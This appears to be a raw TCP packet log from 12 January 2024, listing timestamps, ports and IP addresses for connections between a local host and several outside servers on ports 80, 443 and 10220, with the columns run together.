                                                                                                                                                                      Jan 12, 2024 06:48:03.543555021 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.543611050 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.543951035 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544004917 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544006109 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544069052 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544071913 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544111013 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544131041 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544143915 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544159889 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544203043 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544358015 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544409037 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544431925 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544497013 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544532061 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544585943 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544625044 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544677019 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544881105 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544929028 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.544933081 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544982910 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.544991970 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.545043945 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.545129061 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.545140028 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.545206070 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.545353889 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.545365095 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.545417070 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.545502901 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.545557022 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.545619011 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.545670033 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.545707941 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.545766115 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.545834064 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.545892000 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.546026945 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.546067953 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.546087980 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.546119928 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.546123028 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.546144962 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.546174049 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.546199083 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.546355963 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.546400070 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.546478987 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.546530962 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.546648979 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.546662092 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.546709061 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.546832085 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.546886921 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.546998978 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.547010899 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.547065973 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.547100067 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.547153950 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.547353029 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.547390938 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.547403097 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.547441006 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.547616959 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.547665119 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.547681093 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.547702074 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.547717094 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.547755003 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.547805071 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.547858000 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.548110962 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.548155069 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.548166990 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.548204899 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.548353910 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.548405886 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.548589945 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.548641920 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.548646927 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.548691988 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.548716068 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.548767090 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.548784018 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.548836946 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.551240921 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.551296949 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.551590919 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.551642895 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.551892996 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.551944971 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.551959038 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.552010059 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.552437067 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.552448034 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.552496910 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.552551031 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.552581072 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.552599907 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.552639008 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.552891016 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.552953959 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.554202080 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.554255962 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.554261923 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.554301977 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.554328918 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.554377079 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.554400921 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.554442883 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.554452896 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.554491043 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.554996014 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.555056095 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.555406094 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.555459976 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.555469036 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.555517912 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.555852890 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.555907965 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.556380033 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.556391001 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.556437969 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.556863070 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.556874037 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.556921005 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.557322979 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.557363987 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.557374954 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.557409048 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.557801008 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.557851076 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.557857990 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.557929993 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.558049917 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:03.719274998 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:03.967150927 CET4973580192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:04.269341946 CET8049735175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:04.269443035 CET4973580192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:04.269814014 CET4973580192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:04.484565020 CET49736443192.168.2.4149.154.167.99
                                                                                                                                                                      Jan 12, 2024 06:48:04.484622002 CET44349736149.154.167.99192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:04.484786987 CET49736443192.168.2.4149.154.167.99
                                                                                                                                                                      Jan 12, 2024 06:48:04.493922949 CET49736443192.168.2.4149.154.167.99
                                                                                                                                                                      Jan 12, 2024 06:48:04.493958950 CET44349736149.154.167.99192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:04.571867943 CET8049735175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:04.571963072 CET4973580192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:04.572174072 CET4973580192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:04.874432087 CET8049735175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:04.879882097 CET44349736149.154.167.99192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:04.879997015 CET49736443192.168.2.4149.154.167.99
                                                                                                                                                                      Jan 12, 2024 06:48:04.998114109 CET49736443192.168.2.4149.154.167.99
                                                                                                                                                                      Jan 12, 2024 06:48:04.998171091 CET44349736149.154.167.99192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:04.999209881 CET44349736149.154.167.99192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:04.999305010 CET49736443192.168.2.4149.154.167.99
                                                                                                                                                                      Jan 12, 2024 06:48:05.001157999 CET49736443192.168.2.4149.154.167.99
                                                                                                                                                                      Jan 12, 2024 06:48:05.041996956 CET44349736149.154.167.99192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:05.254463911 CET44349736149.154.167.99192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:05.254554033 CET44349736149.154.167.99192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:05.254606962 CET44349736149.154.167.99192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:05.254755974 CET44349736149.154.167.99192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:05.254929066 CET49736443192.168.2.4149.154.167.99
                                                                                                                                                                      Jan 12, 2024 06:48:05.254929066 CET49736443192.168.2.4149.154.167.99
                                                                                                                                                                      Jan 12, 2024 06:48:05.258116007 CET49736443192.168.2.4149.154.167.99
                                                                                                                                                                      Jan 12, 2024 06:48:05.258152008 CET44349736149.154.167.99192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:05.275438070 CET4973710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:05.463794947 CET1022049737116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:05.463903904 CET4973710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:05.466324091 CET4973710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:05.655698061 CET1022049737116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:05.668860912 CET1022049737116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:05.668880939 CET1022049737116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:05.668948889 CET4973710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:06.278220892 CET4973980192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:06.279158115 CET4973710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:06.309488058 CET4974080192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:06.468985081 CET1022049737116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:06.469208956 CET4973710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:06.469955921 CET4973710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:06.586121082 CET8049739175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:06.586421013 CET4973980192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:06.586731911 CET4973980192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:06.592855930 CET8049740175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:06.593091965 CET4974080192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:06.593430042 CET4974080192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:06.702923059 CET1022049737116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:06.875731945 CET8049740175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:06.875844955 CET4974080192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:06.895298958 CET8049739175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:06.895493031 CET4973980192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:06.895647049 CET4973980192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:06.903429031 CET1022049737116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:06.903523922 CET4973710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:06.960017920 CET4974110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:06.960619926 CET4974080192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:07.152234077 CET1022049741116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:07.152476072 CET4974110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:07.152976990 CET4974110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:07.202183008 CET8049739175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:07.243243933 CET8049740175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:07.342741966 CET1022049741116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:07.343050003 CET1022049741116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:07.343103886 CET4974110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:07.343585968 CET4974110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:07.346007109 CET4974110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:07.534672022 CET1022049741116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:07.837142944 CET1022049741116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:07.837335110 CET4974110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:07.842425108 CET4973710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:07.843172073 CET4974210220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:08.032490015 CET1022049737116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:08.032588005 CET1022049742116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:08.032732964 CET4973710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:08.032846928 CET4974210220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:08.033363104 CET4974210220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:08.222384930 CET1022049742116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:08.222820997 CET1022049742116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:08.222918034 CET4974210220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:08.223490953 CET4974210220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:08.232070923 CET4974210220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:08.422733068 CET1022049742116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:08.745419979 CET1022049742116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:08.745446920 CET1022049742116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:08.745743036 CET4974210220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:08.747395992 CET4974110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:08.748191118 CET4974310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:08.938024998 CET1022049741116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:08.938138962 CET1022049743116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:08.938182116 CET4974110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:08.938241005 CET4974310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:09.303093910 CET4974310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:09.492013931 CET1022049743116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:09.492196083 CET1022049743116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:09.492259026 CET4974310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:09.495196104 CET4974310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:09.498254061 CET4974310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:09.687227964 CET1022049743116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:09.997700930 CET1022049743116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:09.997735977 CET1022049743116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:09.997747898 CET1022049743116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:09.997760057 CET1022049743116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:09.997803926 CET4974310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:09.997849941 CET4974310220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:12.444998026 CET4974480192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:12.586636066 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:12.586719036 CET44349745172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:12.586858034 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:12.597088099 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:12.597136021 CET44349745172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:12.675554991 CET4974680192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:12.723925114 CET4974210220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:12.724750996 CET4974710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:12.744383097 CET8049744175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:12.744492054 CET4974480192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:12.744860888 CET4974480192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:12.803966999 CET44349745172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:12.804075956 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:12.829924107 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:12.829951048 CET44349745172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:12.830962896 CET44349745172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:12.831057072 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:12.833827972 CET49745443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:48:12.873903990 CET44349745172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:12.912944078 CET1022049742116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:12.913028002 CET4974210220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:12.913305044 CET1022049747116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:12.913397074 CET4974710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:12.913822889 CET4974710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:12.962307930 CET8049746175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:12.962515116 CET4974680192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:12.962877035 CET4974680192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:13.044914007 CET8049744175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.045066118 CET4974480192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:13.045144081 CET4974480192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:13.102811098 CET1022049747116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.103159904 CET1022049747116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.103228092 CET4974710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:13.103847980 CET4974710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:13.107112885 CET4974710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:13.107227087 CET4974710220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:13.248234987 CET8049746175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.248337030 CET4974680192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:13.248558998 CET4974680192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:13.296017885 CET1022049747116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.296170950 CET1022049747116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.296183109 CET1022049747116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.344526052 CET8049744175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.534243107 CET8049746175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:13.557156086 CET44349745172.67.139.220192.168.2.4
